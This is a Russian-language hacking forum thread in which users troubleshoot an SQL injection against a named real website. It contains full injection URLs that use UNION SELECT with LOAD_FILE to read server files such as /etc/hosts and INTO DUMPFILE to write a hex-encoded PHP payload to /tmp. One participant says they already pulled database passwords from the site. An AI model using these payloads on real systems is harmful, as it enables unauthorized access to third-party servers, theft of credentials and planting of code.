ANTICHAT — форум по информационной безопасности, OSINT и технологиям

1 А как ты пишешь в файл, если там что-то экранируется?
2 Прочитай индекс файл, или любой файл с веба. Уверен, что база там-же где сайт?
Покажешь хоть один пример?

1. -deleted-

2. Уже читал, пароли к БД вытащил, только с других хостов не пускает (как и положено)


L I G A, Уже пробывал - всё равно не работает

Ошибку пишет
Да что за срань такая!

Ведь если файлы читаются, значит для пользователя установлен флаг file_priv=y, значит и писать можно! Всё, по-другому никак. Или я не прав?

А запрос может быть составлен так, чтобы конструкции into outfile и into dumpfile нельзя было использовать?

Rubaka, да ладно, как показывает моя личная практика - если можно прочитать, файл /etc/passwd, то и в /tmp писать тоже можно!

Опять же где было выставлено? В таблице mysql.user или в правах у папки /tmp?

Так ошибки не должно быть, в том то и дело. синтаксис верный.

_gr34t
?

Пример

читаем /etc/hosts
http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+LOAD_FILE(0x2F6574632F686F7374 73),2

в исходнике смортим он есть

пишем <? phpinfo(); ?>

http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+0x3C3F20706870696E666F28293B20 3F3E,2+FROM+mysql.user+INTO+DUMPFILE+'/tmp/12345'

читаем
/tmp/12345

http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+LOAD_FILE(0x2F746D702F31323334 35),2

и ниче (

Rubaka
Там квотесы включены, с чего он запишется-то?

jokester
ну так файл же читается, и не записывается
как я и говорил

вот что ты говорил.

Вот и покажи мне пример, где у юзера такие ПРАВА, что читать он может, а писать нет.
Кавычки тут никакого отношения к делу не имеют